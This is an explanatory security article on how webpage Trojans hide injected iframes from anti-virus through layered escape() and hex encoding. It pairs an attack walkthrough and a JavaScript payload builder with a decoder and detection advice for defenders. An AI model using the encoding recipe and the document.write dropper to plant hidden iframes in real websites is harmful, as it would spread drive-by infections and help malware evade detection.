How webpage Trojans encode their code to evade anti-virus detection

Source: Internet
Author: User

As webpage Trojans (drive-by download pages) have spread, anti-virus software has started to target them, which has annoyed many attackers. The attackers quickly found a workaround: encode the Trojan-carrying page so that the original code is scrambled and signature-based anti-virus software no longer recognises it. Does that mean an encoded webpage Trojan cannot be stopped? The answer is in the text below. (Tang Wei of Rising: senior security engineer with extensive research in network security.)
Encoding the Trojan-carrying page, which this scene loosely calls "encryption", is a common attacker technique for slipping past anti-virus software. In recent years, attackers who plant a webpage Trojan generally apply a second or even several further layers of encoding to the injected code.
Early on, most attackers used nothing more than a simple Unicode transcoding of the code. Pages encoded this way were soon detected and removed by anti-virus software, so the technique stopped working and page encoding was upgraded step by step: from plain escape() encoding of the injected code, to escape()-encoded character sequences, and finally to custom decoder functions written by the attacker.

Security Encyclopedia: escape() is a function found in JavaScript, VBScript and other scripting languages. In JavaScript, escape() re-encodes characters outside the plain ASCII letters and digits (non-English characters included) as %XX or %uXXXX sequences so they survive a transfer unchanged; unescape() reverses it. Both are legacy functions in modern JavaScript, superseded by encodeURIComponent() and decodeURIComponent().

Why are webpage Trojans encoded?

Webpage Trojans are universally disliked, and anti-virus software pays close attention to them and takes various preventive measures, which limits their spread. To survive longer and to avoid detection by security tools such as anti-virus software, many attackers encode their webpage Trojans, making them harder for anti-virus software to detect and remove and raising the Trojan's survival rate. As a result, mainstream webpage Trojans are encoded.

There are many kinds of webpage Trojan encoding. Most exploit the fact that web page code can be expressed in several standard character encodings and converted between them. In a sense this is not real encryption at all: it merely interferes with anti-virus software that identifies webpage Trojans by signature, while the code itself stays fully recoverable. The more advanced approach is therefore to define a custom function in the scripting language and run the string through it, adding more hurdles that confuse anti-virus software and keep it from recognising the Trojan.

Encoding by character conversion is like speaking to an interpreter in Chinese. Our computer is an interpreter fluent in many languages. We say a sentence to the interpreter, the interpreter writes the passage down in English, then rewrites it with a substitution cipher, and finally sends the English text in Morse code to another interpreter on the far side, who decodes it.

Because the whole process uses only basic code conversion, anyone who knows English and the substitution table can unpick this "password", but to someone who knows neither English nor Morse code it is already thoroughly confusing. Next we take escape() encoding, the method attackers use most, as an example to analyse how webpage Trojans are encoded and how to defend against them.

Security gossip: In the history of cryptography, the most famous substitution device was the "Enigma" cipher machine used by the German armed forces in World War II; it gave the German Army's Blitzkrieg and the German Navy's "wolf pack" U-boat campaign excellent communications secrecy. To break Enigma, the Allies set up a dedicated code-breaking centre in Britain, where the electromechanical "bombe" machines used against Enigma and, later, Colossus, one of the first electronic computers, were developed. Alan Turing, one of the founding figures of 20th-century computing, did much of the theoretical work there, and his ideas shaped many of the prototypes of the modern computer.

Webpage Trojan encoding/decoding walkthrough

Attack

First, write the HTML code to be encoded. Here we use the following IFRAME code:

<iframe src=http://soft.yesky.com width=400 height=300></iframe>


Then open the conversion website http://tool.chinaz.com.

Find "Code Conversion Tool" on the page, choose "URL16 hexadecimal encryption" from the drop-down menu, enter the Trojan page's link address http://soft.yesky.com in the address box and click "encrypt"; the result is http://%73%6F%66%74%2E%79%65%73%6B%79%2E%63%6F%6D/ (Figure 1). Each %XX is simply the hexadecimal ASCII code of one character of the hostname (%73 is "s", %6F is "o", and so on).

Then paste the encoded URL back into the original IFRAME code:

<iframe src=http://%73%6F%66%74%2E%79%65%73%6B%79%2E%63%6F%6D/ width=400 height=300></iframe>


Click "Encode encryption/Decryption tool" in the "Code Conversion Tool" menu, paste the IFRAME code into the input box and click "Encode encryption" to get the encoded code: %3Ciframe+src%3Dhttp%3A%2F%2F%2573%256F%2566%2574%252E%2579%2565%2573%256B%2579%252E%2563%256F%256D%2F+width%3D400+height%3D300%3E%3C%2Fiframe%3E (Figure 2). Note that this encoder writes each "%" of the hex-encoded host as "%25", which is what makes the page doubly encoded, and writes spaces as "+". JavaScript's unescape() only decodes %XX and %uXXXX sequences and leaves "+" untouched, so for the decoder in the next step the spaces must be written as %20 instead; otherwise the browser is handed "<iframe+src=..." rather than a working tag.

Then open WordPad, enter the following code, and paste the encoded string at the indicated place:

<script language="JavaScript"><!--
var Words = "paste the encoded code here";
function OutWord()
{
    var NewWords;
    NewWords = unescape(Words);   // decode the %XX sequences back into the HTML tag
    document.write(NewWords);     // write the decoded <iframe> into the page
}
OutWord();
//-->
</script>

Finally, click "JS encryption/Decryption" in the "Code Conversion Tool" menu, paste the modified JavaScript into the input box and click "JS encryption" to finish the encoding (Figure 3). Add the resulting code to the page into which the Trojan is to be inserted. From then on, whenever a user visits that page, the Trojan is triggered.
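The three encoding layers of the walkthrough above, reproduced in plain JavaScript so the result can be inspected offline. This is an added example, not code from the original article or from tool.chinaz.com; the host soft.yesky.com is the article's own example, while the function names and the exact form of the third layer ("JS encryption", modelled here as a second escape() wrapped in eval(unescape(...))) are assumptions made for the example.

```javascript
// Added example (not the article's or tool.chinaz.com's code). Reproduces the
// three encoding layers of the walkthrough; the "JS encryption" layer is an
// assumed model (escape() again, wrapped in eval(unescape(...))).

// Layer 1: "URL16 hexadecimal" encoding of the hostname only, one %XX per byte.
function hexEncodeHost(url) {
  const m = /^(https?:\/\/)([^/]+)(\/.*)?$/.exec(url);
  if (!m) throw new Error("unsupported URL: " + url);
  const host = Array.from(m[2], ch => {
    const code = ch.charCodeAt(0);
    if (code > 0x7f) throw new Error("ASCII hostnames only: " + ch);
    return "%" + code.toString(16).toUpperCase().padStart(2, "0");
  }).join("");
  return m[1] + host + (m[3] || "/");
}

function buildIframe(src) {
  return `<iframe src=${src} width=400 height=300></iframe>`;
}

// Layer 2: escape() the whole tag and hide it behind unescape()/document.write.
// escape() writes a space as %20, which unescape() reverses. A form-style
// encoder that writes spaces as "+" (as the tool output on the page does)
// does NOT round-trip, because unescape() leaves "+" untouched.
function dropperJs(html) {
  return `var Words="${escape(html)}";document.write(unescape(Words));`;
}

// Layer 3 (assumed model of the tool's "JS encryption"): escape() the script
// again and wrap it in eval(unescape(...)).
function packScript(js) {
  return `eval(unescape("${escape(js)}"))`;
}

function buildPayload(url) {
  const js = dropperJs(buildIframe(hexEncodeHost(url)));
  return `<script>${packScript(js)}</script>`;
}

// Form-style encoding for comparison: spaces become "+".
function formEncode(s) {
  return encodeURIComponent(s).replace(/%20/g, "+");
}

// escape() never touches letters, digits or @*_+-./, so literal tokens such as
// "iframe" and "document.write" remain readable inside every layer; that is
// why the attacker hex-encodes the host separately in layer 1.
function visibleTokens(payload, tokens = ["iframe", "document.write", "unescape", "soft.yesky.com"]) {
  return tokens.filter(t => payload.includes(t));
}

const payload = buildPayload("http://soft.yesky.com");
console.log(payload);
console.log("tokens still readable:", visibleTokens(payload).join(", "));
```

Two things the output makes visible that the walkthrough does not: the hostname disappears (it shows up only as %252573... after three layers), but the words iframe, unescape and document.write survive every layer untouched, so a signature for those tokens still fires; and a "+"-encoded space survives unescape() as a literal "+", which is why layer 2 must use %20.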


Defense

When a security engineer meets an encoded malicious page, he too goes to the conversion site, pastes the tangled code into the decryption box and clicks "decrypt" to get the original back. Because decoding involves converting between different character encodings, you have to recognise the features of each encoding as you go. escape() output is a "%" followed by two hexadecimal digits; Chinese text converted with escape() comes out as "%" followed by the lowercase letter "u" and four hexadecimal digits; and a "%25" followed by two hexadecimal digits means the percent sign itself was encoded, i.e. the text has been through more than one layer and must be decoded again.
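A small decoder that does what the paragraph above describes by hand: it peels the layered escape()/URL-hex encoding one pass at a time, records each layer, and then reports the indicators an analyst looks for in the decoded result. This is an added example, not code from the original article; the sample input is constructed here with escape() (the article's iframe with the hex-encoded host, wrapped in escape()+document.write, then escaped again inside eval(unescape(...))), and the host soft.yesky.com is the article's own example.

```javascript
// Added example (not the article's code): peel layered escape()/URL-hex
// encoding and report indicators. Sample input is constructed below.

// One or more consecutive %XX / %uXXXX sequences.
const PCT_RUN = /(?:%(?:u[0-9A-Fa-f]{4}|[0-9A-Fa-f]{2}))+/g;

// Decode every percent-encoded run in place and repeat until a pass changes
// nothing (or the layer limit is reached). Every intermediate layer is kept
// so the analyst can see what each "encryption" step wrapped.
function peelLayers(text, maxLayers = 10) {
  const layers = [text];
  let cur = text;
  for (let i = 0; i < maxLayers; i++) {
    const next = cur.replace(PCT_RUN, run => unescape(run));
    if (next === cur) break;
    cur = next;
    layers.push(cur);
  }
  return layers;
}

// The encoding "features" the article tells the analyst to recognise:
//   %uXXXX  escape() output for non-ASCII text such as Chinese
//   %XX     escape() / URL-hex output for ASCII
//   %25XX   a percent sign that was itself encoded, i.e. a second layer
function describeEncoding(text) {
  return {
    unicode: /%u[0-9A-Fa-f]{4}/.test(text),
    hex: /%[0-9A-Fa-f]{2}/.test(text),
    doubleEncoded: /%25[0-9A-Fa-f]{2}/.test(text),
  };
}

const INDICATORS = [
  ["iframe", /<iframe\b/i],
  ["document.write", /document\.write\s*\(/i],
  ["eval", /\beval\s*\(/i],
  ["unescape", /\bunescape\s*\(/i],
];

// Peel all layers, then scan the fully decoded text for indicators and URLs.
function analyze(text) {
  const layers = peelLayers(text);
  const final = layers[layers.length - 1];
  const indicators = INDICATORS.filter(([, re]) => re.test(final)).map(([name]) => name);
  const urls = Array.from(final.matchAll(/https?:\/\/[^\s"'<>]+/g), m => m[0]);
  return { depth: layers.length - 1, encoding: describeEncoding(text), indicators, urls, final };
}

// Constructed sample: layer 1 is the article's iframe with the hex-encoded
// host; layer 2 wraps it in escape()+document.write; layer 3 escapes that
// script again inside eval(unescape(...)).
const SAMPLE_HTML = "<iframe src=http://%73%6F%66%74%2E%79%65%73%6B%79%2E%63%6F%6D/ width=400 height=300></iframe>";
const SAMPLE_JS = `var Words="${escape(SAMPLE_HTML)}";document.write(unescape(Words));`;
const SAMPLE_PAGE = `<script>eval(unescape("${escape(SAMPLE_JS)}"))</script>`;

function demo() {
  return analyze(SAMPLE_PAGE);
}

const report = demo();
console.log("layers peeled:", report.depth);
console.log("encoding features:", JSON.stringify(report.encoding));
console.log("indicators:", report.indicators.join(", "));
console.log("urls:", report.urls.join(", "));
```

The decoder never executes anything: it only rewrites percent sequences, so a dropper built around eval() is defused rather than run. Decoding runs in place rather than extracting string literals, which is what lets one loop handle a bare hex-encoded URL, a %25-doubly-encoded blob and an eval(unescape("...")) wrapper alike; the layer count it returns (3 for the sample) is a useful triage signal on its own, since legitimate pages rarely encode themselves more than once.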

The best defence against encoded malicious pages is to turn on the script-filtering function of your anti-virus software, or to select "Disable script debugging" on the "Advanced" tab of IE's Internet Options. Note, however, that "Disable script debugging" only stops IE from launching the script debugger on errors; to actually stop page scripts from running, Active Scripting must be disabled in the security zone settings. In addition, Firefox sometimes blocks JS-encoded and URL-hex-encoded pages automatically, so you can use Firefox when browsing pages you suspect are dangerous.
